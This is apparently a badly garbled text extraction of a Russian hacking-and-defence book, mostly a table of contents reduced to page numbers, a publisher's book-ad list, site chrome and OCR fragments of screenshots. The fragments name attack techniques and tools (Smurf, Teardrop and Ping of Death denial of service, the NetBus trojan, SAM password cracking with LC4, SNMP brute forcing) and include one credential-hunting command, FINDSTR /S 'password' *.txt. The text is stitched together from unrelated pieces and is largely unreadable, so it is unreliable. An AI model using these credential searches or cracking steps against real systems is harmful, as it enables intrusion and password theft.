169
171
176
177
178
4. Web
180
12. Web-
181
Web-
Web-
Web-
181
182
184
184
186
IIS 5
187
HTTP

188
191
Web- Teleport Pro
197

HTML
198
202
204
Web
205
208
13. DoS
DoS

UDP
209
Smurf
213
214

Nuke
Teardrop
Ping of Death
Land
'.

DoS
...
210
211
211
215
218
218
220
220
221
221
222
225
392
5. TCP/IP
226
14. Windows 2000/XP
227
TCP/IP

NetBus

227
229
229
231
232
234
235
239
241
15.
242
pcAnywhere
:
pcAnywhere
pcAnywhere
SNMP
SNMP
SOLARWINDS
243
243
.249
252
252
253
257
16.
258

WinRoute Pro

WinRoute Pro
WinRoute Pro
ACL
FTP
ACL
258
259
261
265
266
267
267
268
269
271
273
273
274
275
276
17.

277
277
... 279
393
ARP
TCP-
280
282
285
18.

PhoneSweep 4.4
286
287
288
PhoneSweep 4.4

288
290
292
294
PhoneSweep
295
295
299
. HTML DHTML

300
300
HTML
HTML
301
302
HTML
306
Ter<Form>

Ter<SCRIPT>

306
307
309
310
313
. CGI
315
316
317
318
. HTTP
HTTP
HTTP
D. TCP/IP
OSI

320
322
322
324
325
328
331
331
334
337
337
338
394

OSI
IP-
TCP/IP
IP-
TCP/IP

Active Directory
IP-
iPsec
'.
.

-

Windows 2000
338
339
339
339
340
340
340
341
343
344
346
346
350
352
355
358
358
360
361
363
363
364
366
366
367
369
370
371
372
372
374
375
376
377
378
379
F. -
381
387
U
U AHTUXAKUHC:
U

( , , , - 3000)
: (095) 720-07-65 (). E-mail: opt@triumph.ru
-: www.3st.ru
-: 125438, ., / 18 . E-mail: post@triumph.ru
:
-
-
-
, , - Alex WebKnacKer.
.. .
.. .
.. .
. 125438, ., / 18.
00033 10.08.99 .
- 25.10.03 .
70x100/16. . . . 25.
1687.
4000 .

143200, . , . , 93
( , ,
, - 3000)

, ,
:
125438, . , / 18
,
.
-:
www.3st.ru
:
post@triumph.ru
,
.
!!!

(!) ,
.
001
002
003
092
084
096
100
. 20
, , .
+ -. (448 .)
.
50 , ,
AudioCD, MP3, DVD-Audio
, WMA, WAV (PCM), OGG,
, (+), VQF, MIDI, RM, Dolby Digital (AC3) u Dolby
Surround. + -. (416 .)
. 25
, , , , , ,
. + -. (432 .)
. 25 , , -, ,
, , Web -: ICQ, NetMeeting, The Bat!, WinAmp, Opera,
Agintum Outpost, MP3Locator, GetRight, Promt XT Internet ...
+ -. (384 .)
. 15 / ,
, , : ScenalyzerLive, Ulead MediaStudio, Adobe Premiere,
Adobe After Effects, Hollywood FX, Boris RED, Canopus XPIode, Morph
Man, Ulead COOL 3D, Illusion, Sound Forge, Audiograbber, WinMP3
Locator, Gnucleus, Audio Compositor. + -. (416 .)
. 11
.
+ -. (416 .)
.
25 VidcoCD,
SuperVideoCD, MPEG 4, DVD
X(S)VideoCD. + -. (400 .)
299
242
242
242
299
299
299
028
CD-ROM, AudioCD,
VideoCD, DVD. + -. (368 .)
237
029
. ,
: Ulead Mediastudio Pro 7.
+ -. (576.)
299
098
. : .
+ -. (400.)
199
085
. -
. (8000 . 528 .)
179
030
, ,
Web-. + -. (464 .)
217
082
027
. : , ,
. + -. (400 .)
. , .
(368 .)
217
159
009
. .
+ -. .. . (368.)
013
Web- Web-. . (496 .)
149
012
. . (400 .)
159
217
179
033
! + .
080
Windows 98/ME/2000/XP. + . (400 .)
179
087
! + . (352 .)
179
099
! + . (416 .)
299
(384 .)
019

. . . (784 .)
345
101
Web-. + -. (560 .)
345
Adobe After Effects 5.0. , ,

. .
+ -. (400 .)
299
023
Adobe Premiere* 6.x. .

+ -. (448 .)
299
091
Adobe Photoshop 7. .
+ -. (496 .)
299
090
Adobe Illustrator 9 10. .

+ -. (464 .)
299
040
-. (368 .)
181
041
, , , CD, DVD
. (400 .)
181
097
088
022
.
(368 .)
. (400 .)
181
181
018
XML . + -. (368 .)
242
017
WAP . -
. + -. (416 .)
242
095
.
+ -. (320 .)
.
+ -. (336 .)
242
C++ . + -.
(464 .)
299
089
102
242

Alex WebKnacKer - Быстро и Легко. Хакинг и Антихакинг Защита и Нападение

Загружено:

Сведения о документе

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Alex WebKnacKer - Быстро и Легко. Хакинг и Антихакинг Защита и Нападение

Загружено:

Авторское право:

Доступные форматы

SNMP Brute

14. Windows 2000/XP

- , MS Office Oracle. , , , 11 2002 SecurityLab.ru Oracle 9i ,

, . , Internet Security Systems (ISS) (http://www.iss.net) - .. ,

Rambler (http://www.rambler.ru) ...

Amaka cepOepoB \l\leb

Kak Windows 2000/XP

. 5.1. NTFSDOS Pro

> Next ().

ding language information enables NTFSDOS Professional to correctly transla

> Next ().

Puc. 5.4. Windows

Puc. 5.5. NTFSDOS Pro

nsert . (loppy labelled NTFSDOS Professional Disk 1

Press Next to copy files to A:\.

. 5.6. NTFSDOS Pro

nsert efloppy labelled NTFSDOS Professional Disk 1

Copying files to diskette...

Puc. 5.8. NTFSDOS Pro

> Finish (),

, Windows Windows. CD-ROM

Import From Local Machine

Use the Import menu to retrieve accounts to audit.

' empty '

' empty '

empty empty '

Dictionary! ofl [CAProgiam Fites'i@stake\LC41,ivoids-english.dic]

Puc. 5.13. SAM !

Custom Chatacttt SeUfel each ehauctwfc

Dictionary/Brute Hybrid Crack (/ ),

Repwl (version 6.5. Demo)

User name | |ALEX

Brute force | SmartForce f Dictionary |

| tj Local Net Share's resources

Puc. 5.17. 007 !

Number of cached passwords: 0

AutoSave every 10 minutes

Total variants: 1 679616

si Searching I Time left.

Variator| BAS info | Shared Res.. | Mail | PSIorage [ Other | More... |

Outlook Express accounts' list

POP3 Server Name: 'sword-2000.sword.net1

FINDSTR /S "password " *.txt

flouck cmpok 6 BinText

Time taken : 0.000 sees Text size: 444 bytes (0.43K)

File pos [ Mem pos | ID (Text

> Go! (). BinText 3.00

Time token : 0 01 0 sees Text size: 21 A bytes (0 21 K)

Reenter password for verification

Include th<>se characters too

Min text length

1 or more repeated characters

Q Discard strings with

MUST contain these

Stage 1 - Characters included in the definition of a string ( 1 , )

flakem OfficePassw/ord 3.5

> Select document ( )

| Display help info

'Circled +' Cursor

| Check For Update |1

Text of Window Under 'Circled +' Cursor (if available)

Length of available text: 3

Reposition Revelation out of the way when dragging 'circled +'

Puc. 6.9. NetBus Sword-2000